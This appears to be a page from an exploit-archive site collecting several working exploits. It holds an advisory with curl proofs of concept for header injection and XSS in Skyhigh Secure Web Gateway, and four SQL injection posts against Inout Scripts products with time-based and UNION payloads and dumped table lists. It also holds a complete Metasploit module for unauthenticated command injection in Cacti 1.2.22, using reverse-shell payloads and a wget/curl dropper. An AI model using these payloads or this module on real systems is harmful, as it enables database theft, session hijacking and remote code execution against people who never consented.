Latest exploits :: CodePwn

<pre><code>RedTeam Pentesting identified a vulnerability which allows attackers to craft URLs to any third-party website that result in arbitrary content to be injected into the response when accessed through the Secure Web Gateway. While it is possible to inject arbitrary content types, the primary risk arises from JavaScript code allowing for cross-site scripting. Details ======= Product: Secure Web Gateway Affected Versions: 10.2.11, potentially other versions Fixed Versions: 10.2.17, 11.2.6, 12.0.1 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://www.skyhighsecurity.com/en-us/products/secure-web-gateway.html Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-002 Advisory Status: published CVE: CVE-2023-0214 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0214 Introduction ============ "Skyhigh Security Secure Web Gateway (SWG) is the intelligent, cloud-native web security solution that connects and secures your workforce from malicious websites and cloud apps—from anywhere, any application, and any device." (from the vendor's homepage) More Details ============ The Secure Web Gateway's (SWG) block page, which is displayed when a request or response is blocked by a rule, can contain static files such as images, stylesheets or JavaScript code. These files are embedded using special URL paths. Consider the following excerpt of a block page: ------------------------------------------------------------------------ <html>   <head> <meta content="text/html; charset=UTF-8" http-equiv="Content-Type"> <meta http-equiv="X-UA-Compatible" content="IE=7" /> <title>McAfee Web Gateway - Notification</title> <script src="/mwg-internal/de5fs23hu73ds/files/javascript/sw.js" type="text/javascript" ></script> <link rel="stylesheet" href="/mwg-internal/de5fs23hu73ds/files/default/stylesheet.css" /> </head> ------------------------------------------------------------------------ Static content is loaded from URL paths prefixed with "/mwg-internal/de5fs23hu73ds/". It was discovered that paths with this prefix are intercepted and directly handled by the SWG no matter on which domain they are accessed. While the prefix can be configured in the SWG, attackers can also obtain it using another currently undisclosed vulnerability. By reverse engineering the file "libSsos.so" and analysing JavaScript code, it was possible to derive the API of the "Ssos" plugin's "SetLoginToken" action. Through the following call using the command-line HTTP client curl, the behaviour of the plugin was further analysed: ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 -i 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p' HTTP/1.0 200 OK P3P: p Connection: Keep-Alive Set-Cookie: MwgSso=v; Path=/; Max-Age=240; Content-Type: application/javascript Content-Length: 2 X-Frame-Options: deny c; ------------------------------------------------------------------------ The response embeds the values of the three URL parameters "v", "c" and "p". The value for "p" is embedded as value of the "P3P" header, the value of "c" as the response body and the value of "v" as the value of the cookie "MwgSso". It is also possible to include newline or carriage return characters in the parameter value which are not encoded in the output. Consequently, if the value of the parameter "p" contains a line break, arbitrary headers can be injected. If two line breaks follow, an arbitrary body can be injected. If a suitable "Content-Length" header is injected, the remaining headers and body of the original response will be ignored by the browser. This means that apart from the initial "P3P" header, an arbitrary response can be generated. For example, a page containing JavaScript code could be returned, resulting in a cross-site scripting attack. Consequently, attackers can construct URL paths that can be appended to any domain and cause an arbitrary response to be returned if the URL is accessed through the SWG. This could be exploited by distributing such URLs or even by offering a website which performs an automatic redirect to any other website using such a URL. As a result, the SWG exposes its users to self-induced cross-site scripting vulnerabilities in any website. Proof of Concept ================ In the following request, the "p" parameter is used to inject suitable "Content-Type" and "Content-Length" headers, as well as an arbitrary HTML response body. ------------------------------------------------------------------------ $ curl --proxy http://192.168.1.1:8080 'https://gateway.example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=v&c=c&p=p%0aContent-Type: text/html%0aContent-Length: 27%0a%0a<h1>RedTeam Pentesting</h1>' HTTP/1.0 200 OK P3P: p Content-Type: text/html Content-Length: 27 <h1>RedTeam Pentesting</h1> ------------------------------------------------------------------------ As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL resulting in a cross-site scripting vulnerability. Workaround ========== None. Fix === According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL: https://kcm.trellix.com/corporate/index?page=content&id=SB10393 Security Risk ============= The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in context of any domain. Attackers only need to convince users to open a prepared URL or visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability such as account takeover. As a result, this vulnerability poses a high risk. Timeline ======== 2022-07-29 Vulnerability identified 2022-10-20 Customer approved disclosure to vendor 2022-10-20 Vulnerability was disclosed to the vendor 2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1. 2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Alter Posthof 1 Fax : +49 241 510081-99 52062 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Jobs Portal 2.2.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company reputation │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php?page=jobs/searchresult Method: POST POST parameter 'loc_id' is vulnerable to SQLI +-----------------------------------------------------------+ -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="search_query" web -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="c_id" 1 -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="loc_id" 1[INJECT-HERE] -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="serchtype" simple -----------------------------245625052541747605171577107419 Content-Disposition: form-data; name="c_id" 0 -----------------------------245625052541747605171577107419 +-----------------------------------------------------------+ [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.6 [INFO] fetching tables for database: '*****_jobs_portal' Database: *****_jobs_portal [53 tables] +-----------------------------------------+ | nesote_inoutscripts_company_ratereview | | nesote_inoutscripts_homepage_banner | | nesote_inoutscripts_users | | nesote_jobportal_admin | | nesote_jobportal_applied_jobs | | nesote_jobportal_city | | nesote_jobportal_client_logs | | nesote_jobportal_company_size | | nesote_jobportal_company_type | | nesote_jobportal_companyblock | | nesote_jobportal_contents | | nesote_jobportal_country | | nesote_jobportal_coverletters | | nesote_jobportal_currency | | nesote_jobportal_email_templates | | nesote_jobportal_employer_details | | nesote_jobportal_employer_feedback | | nesote_jobportal_functional_role | | nesote_jobportal_industry | | nesote_jobportal_ip_012023 | | nesote_jobportal_ip_022020 | | nesote_jobportal_ip_032020 | | nesote_jobportal_ip_042020 | | nesote_jobportal_ip_082021 | | nesote_jobportal_ip_092022 | | nesote_jobportal_ip_102022 | | nesote_jobportal_ip_112022 | | nesote_jobportal_ip_122022 | | nesote_jobportal_ipn | | nesote_jobportal_job_types | | nesote_jobportal_jobs | | nesote_jobportal_jobseeker_details | | nesote_jobportal_languages | | nesote_jobportal_locations | | nesote_jobportal_messages | | nesote_jobportal_months_messages | | nesote_jobportal_news_and_events | | nesote_jobportal_notifications | | nesote_jobportal_packages | | nesote_jobportal_payment_details | | nesote_jobportal_previous_exp | | nesote_jobportal_qualifications | | nesote_jobportal_resumes | | nesote_jobportal_saved_jobs | | nesote_jobportal_saved_resumes | | nesote_jobportal_seekers_qualifications | | nesote_jobportal_sent_jobalerts | | nesote_jobportal_settings | | nesote_jobportal_skills | | nesote_jobportal_specifications | | nesote_jobportal_states | | nesote_jobportal_success_story | | nesote_jobportal_themes | +-----------------------------------------+ [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Music 5.1.1 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company reputation │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php?page=explore/search Method: POST POST parameter 'title' is vulnerable to SQLI --- Parameter: title (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=1' AND (SELECT 9844 FROM (SELECT(SLEEP(5)))scaa) AND 'tLOV'='tLOV --- POST parameter 'genre' is vulnerable to SQLI --- Parameter: genre (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=1&type=videoalbum&genre=1') AND (SELECT 3533 FROM (SELECT(SLEEP(5)))ENgP) AND ('MnKg'='MnKg&country=10 --- POST parameter 'country' is vulnerable to SQLI --- Parameter: country (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=1&type=videoalbum&genre=1&country=10 AND (SELECT 4811 FROM (SELECT(SLEEP(5)))nDdo) --- +-----------------------------------------------------------+ POST /index.php?page=explore/search HTTP/2 -----------------------------116235583720082436942508111905 Content-Disposition: form-data; name="title" love[Inject-HERE] -----------------------------116235583720082436942508111905 Content-Disposition: form-data; name="type" audioalbum -----------------------------116235583720082436942508111905 Content-Disposition: form-data; name="genre" 1[Inject-HERE] -----------------------------116235583720082436942508111905 Content-Disposition: form-data; name="country" 3[Inject-HERE] -----------------------------116235583720082436942508111905-- +-----------------------------------------------------------+ [-] Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Cacti 1.2.22 unauthenticated command injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in order to achieve unauthenticated remote code execution as the www-data user. The module first attempts to obtain the Cacti version to see if the target is affected. If LOCAL_DATA_ID and/or HOST_ID are not set, the module will try to bruteforce the missing value(s). If a valid combination is found, the module will use these to attempt exploitation. If LOCAL_DATA_ID and/or HOST_ID are both set, the module will immediately attempt exploitation. During exploitation, the module sends a GET request to /remote_agent.php with the action parameter set to polldata and the X-Forwarded-For header set to the provided value for X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the poller_id parameter is set to the payload and the host_id and local_data_id parameters are set to the bruteforced or provided values. If X_FORWARDED_FOR_IP is set to an address that is resolvable to a hostname in the poller table, and the local_data_id and host_id values are vulnerable, the payload set for poller_id will be executed by the target. This module has been successfully tested against Cacti version 1.2.22 running on Ubuntu 21.10 (vulhub docker image) }, 'License' => MSF_LICENSE, 'Author' => [ 'Stefan Schiller', # discovery (independent of Steven Seeley) 'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller) 'Owen Gong', # @phithon_xg - vulhub PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2022-46169'], ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'Type' => :unix_memory } ], [ 'Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ] ], 'Privileged' => false, 'DisclosureDate' => '2022-12-05', 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options([ OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']), OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']), OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']), OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.']) ]) register_advanced_options([ OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]), OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]), OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]), OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100]) ]) end def check # sanity check to see if the target is likely Cacti res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('<title>Login to Cacti') return CheckCode::Safe('Target is not a Cacti application.') end # get the version version = res.body.scan(/Version (.*?) \| $c$/)&.flatten&.first if version.blank? return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.') end begin if Rex::Version.new(version) <= Rex::Version.new('1.2.22') return CheckCode::Appears("The target is Cacti version #{version}") else return CheckCode::Safe("The target is Cacti version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}") end end def exploitable_rrd_names [ 'apache_total_kbytes', 'apache_total_hits', 'apache_total_hits', 'apache_total_kbytes', 'apache_cpuload', 'boost_avg_size', 'boost_peak_memory', 'boost_records', 'boost_table', 'ExportDuration', 'ExportGraphs', 'syslogRuntime', 'tholdRuntime', 'polling_time', 'uptime', ] end def brute_force_ids # perform a sanity check first if @host_id host_ids = [@host_id] else if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID'] fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible') end host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a end if @local_data_id local_data_ids = [@local_data_ids] else if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID'] fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible') end local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a end # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id max_attempts = host_ids.length * local_data_ids.length if max_attempts > 1000 fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.') end potential_targets = [] request_ct = 0 print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations") host_ids.each do |h_id| print_status("Enumerating local_data_id values for host_id #{h_id}") local_data_ids.each do |ld_id| request_ct += 1 print_status("Performing request #{request_ct}...") if request_ct % 25 == 0 res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000))) unless res print_error('No response received. Aborting bruteforce') return nil end unless res.code == 200 print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce") return nil end begin parsed_response = JSON.parse(res.body) rescue JSON::ParserError print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce") return nil end unless parsed_response.is_a?(Array) print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce") return nil end # the array can be empty, which is not an error but just means the local_data_id is not exploitable next if parsed_response.empty? first_item = parsed_response.first unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) } print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce") return nil end # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it # in addition, some data source types have an empty rrd_name but are still exploitable # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options rrd_name = first_item['rrd_name'] if rrd_name.empty? potential_targets << [h_id, ld_id] elsif exploitable_rrd_names.include?(rrd_name) print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}") return [h_id, ld_id] else next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on end end end return nil if potential_targets.empty? # inform the user about potential targets print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:") potential_targets.each do |h_id, ld_id| print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}") end print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options') nil end def execute_command(cmd, _opts = {}) # use base64 encoding to get around special char limitations cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`" send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0) end def exploit @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present? @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present? unless @host_id && @local_data_id brute_force_result = brute_force_ids unless brute_force_result fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.') end @host_id, @local_data_id = brute_force_result end if target.arch.first == ARCH_CMD print_status('Executing the payload. This may take a few seconds...') execute_command(payload.encoded) else execute_cmdstager(background: true) end end def remote_agent_request(ld_id, h_id, poller_id) { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'remote_agent.php'), 'headers' => { 'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP'] }, 'vars_get' => { 'action' => 'polldata', 'local_data_ids[0]' => ld_id, 'host_id' => h_id, 'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload } } end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Homestay 2.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php?page=search/searchdetailed broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis POST parameter 'broom' is vulnerable to SQLI POST parameter 'bathr' is vulnerable to SQLI POST parameter 'beds' is vulnerable to SQLI POST parameter 'numguest' is vulnerable to SQLI Path: /index.php?page=search/rentals location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana POST parameter 'guests' is vulnerable to SQLI --- Parameter: broom (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split Type: UNION query Title: Generic UNION query (NULL) - 27 columns Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [INFO] fetching tables for database: '*****_homestay' Database: *****_homestay [52 tables] +----------------------------------+ | admin_account | | admin_payment_details | | category_property | | chat_details | | chat_messages | | checkout_ipn | | countries | | coupon_detail | | cron_details | | custom_field | | demo_message | | email_details | | email_templates | | forgetpassword | | host_rejected | | inout_ipns | | languages | | list_date_request | | list_images | | listing_date | | listing_detail | | listing_main | | message_notify_app | | messages | | msg_req_temp | | ppc_currency | | public_side_media_detail | | public_slide_images | | refund_creditupdate | | request_coupon_detail | | settings | | superhost_detail | | traveller_bank_deposit_history | | traveller_cancellation_modes | | traveller_cancelled | | user_account_detail | | user_address_verify_request | | user_details | | user_email_verification | | user_listing_request | | user_refunddetails | | user_registration | | user_reviews | | user_search_details | | user_settings | | user_wishlist_mapping | | user_withdrawal_details | | userabusereport | | userbank_pending_listing_request | | usercancellationsaction | | wish_list | | withdrawal_request | +----------------------------------+ [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout RealEstate 2.1.3 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php POST parameter 'lidaray' is vulnerable to SQLI lidaray=[Inject-HERE] --- Parameter: lidaray (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [INFO] fetching tables for database: '*****_realestate' [INFO] fetching number of tables for database ''*****_realestate' Database: *****_realestate [45 tables] +--------------------------------+ | adcode | | admin_account | | admin_payment_details | | agent_list_request_to_user | | broker_citymap | | broker_rate | | broker_review | | brokerabusereport | | category_property | | chat_details | | chat_messages | | checkout_ipn | | countries | | custom_field | | detail_statistics_list | | email_templates | | enquiry_status | | forgetpassword | | inout_ipns | | invoicegen | | languages | | list_brokermap | | list_images | | list_main | | listopenhouse | | normal_statistics_list | | paymentdetailstat | | popularsearchlist | | ppc_currency | | public_side_media_detail | | public_slide_images | | recentsearchlist | | settings | | sold_listing | | soldlistadd | | traveller_bank_deposit_history | | user_broker_licenses | | user_broker_registration | | user_email_verification | | user_list_agent_request | | user_registration | | user_wishlist_mapping | | userabusereport | | userlistactive | | wish_list | +--------------------------------+ [-] Done </code></pre>